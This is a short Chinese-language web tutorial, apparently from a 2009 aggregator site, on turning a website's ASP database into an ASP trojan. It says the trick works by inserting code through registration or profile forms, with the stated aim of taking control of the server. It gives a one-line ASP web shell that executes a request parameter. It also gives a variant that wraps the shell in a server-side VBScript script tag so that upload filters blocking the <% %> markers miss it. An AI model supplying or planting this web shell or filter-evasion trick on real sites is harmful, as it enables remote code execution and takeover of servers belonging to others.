当前位置: 首页 > 图文教程 > 网络编程 > ASP > 插入ASP代码让网站数据库成为ASP木马

ASP
ASP漏洞集-跨站Script攻击和防范
利用JSP的思想来做ASP
asp的19个基本技巧
自定义aspnet_client的位置
编码的风格和如何设置调试代码
RS.GETROWS使用详解
Adodb.Stream 组件的使用说明
在ASP.Net中实现RSA加密
关于水晶报表10 的字报表数据填充和显示
DataList里套DataGrid,DataBind
ASP.NET验证控件详解
ASP网站漏洞解析及黑客入侵防范方法
产生一个密码,并记录到数据库,然后发送给用户
ASP内置对象 Request对象 详解
ASP 中 DateDiff 函数详解
几个常用的小函数
在记录集中加入判断使之灵活
会员系统“找回密码”的制作方法
一个分页代码例子
常见的错误及其解决方法

插入ASP代码让网站数据库成为ASP木马


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-08-14   浏览: 170 ::
收藏到网摘: n/a

很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是:

〈%execute request("l")%〉

我们可以把它的标签换下来。

然后改成:

<scriptlanguage=VBScript runat=server>execute request("l")</Script>

这样就避开了使用〈%%〉,保存为.ASP,程序同样执行。